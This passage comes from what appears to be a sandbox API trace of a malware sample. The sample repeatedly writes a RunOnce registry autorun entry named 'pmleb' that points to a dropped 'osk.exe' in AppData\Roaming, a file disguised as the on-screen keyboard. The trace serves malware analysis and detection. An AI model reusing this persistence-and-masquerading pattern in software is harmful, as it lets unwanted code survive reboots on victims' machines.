samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.927] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.927] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.928] RegCloseKey (hKey=0x280) returned 0x0 [0079.928] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.928] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.928] SetTimer (hWnd=0x20280, nIDEvent=0x205a, uElapse=0xa, lpTimerFunc=0x0) returned 0x205a [0079.928] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.940] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.940] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.940] KillTimer (hWnd=0x20280, uIDEvent=0x205a) returned 1 [0079.940] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.940] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.941] IUnknown:Release (This=0x787518) returned 0x1 [0079.941] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.941] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.941] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.941] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.941] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.941] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.941] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.941] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.941] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.941] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5b [0079.941] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.941] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5c [0079.942] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.942] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5b [0079.942] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.942] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.942] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.943] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.943] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.943] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.943] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.943] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.943] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.943] RegCloseKey (hKey=0x280) returned 0x0 [0079.943] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.943] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.943] SetTimer (hWnd=0x20280, nIDEvent=0x205b, uElapse=0xa, lpTimerFunc=0x0) returned 0x205b [0079.944] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.956] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.956] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.956] KillTimer (hWnd=0x20280, uIDEvent=0x205b) returned 1 [0079.956] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.956] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.956] IUnknown:Release (This=0x787518) returned 0x1 [0079.956] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.956] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.957] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.957] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.957] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.957] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.957] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.957] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.957] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.957] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5c [0079.957] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.957] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5d [0079.957] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.958] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5c [0079.958] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.958] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.958] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.958] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.958] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.958] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.958] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.959] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.959] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.959] RegCloseKey (hKey=0x280) returned 0x0 [0079.959] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.959] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.959] SetTimer (hWnd=0x20280, nIDEvent=0x205c, uElapse=0xa, lpTimerFunc=0x0) returned 0x205c [0079.959] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.973] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.973] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.973] KillTimer (hWnd=0x20280, uIDEvent=0x205c) returned 1 [0079.973] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.973] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.973] IUnknown:Release (This=0x787518) returned 0x1 [0079.973] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.973] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.974] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.974] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.974] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.974] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.974] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.974] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.974] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.974] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5d [0079.974] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.974] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5e [0079.974] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.975] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5d [0079.975] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.975] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.975] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.975] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.975] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.975] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, 